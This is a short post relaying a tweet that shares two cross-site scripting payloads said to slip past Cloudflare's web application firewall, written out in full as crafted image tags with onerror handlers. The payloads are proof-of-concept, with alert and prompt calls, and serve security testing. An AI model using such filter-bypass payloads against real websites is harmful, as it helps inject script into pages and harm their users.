A recent tweet shared two XSS payloads for Cloudflare WAF bypass. The first payload is <img%20hrEF="x"%20sRC="data:x","%20oNLy=1%20oNErrOR=prompt`1`//>. This payload attempts to bypass Cloudflare's WAF by using a crafted image tag with specific attributes. The second payload provided is <img//////src=x oNlY=1 oNerror=alert('xxs')//. These payloads aim to evade security measures set by Cloudflare's WAF. Security researchers are advised to test these payloads cautiously. Potential impact and mitigation strategies should be considered.
Original tweet: https://twitter.com/Shad0wH3x/status/1888044832796606469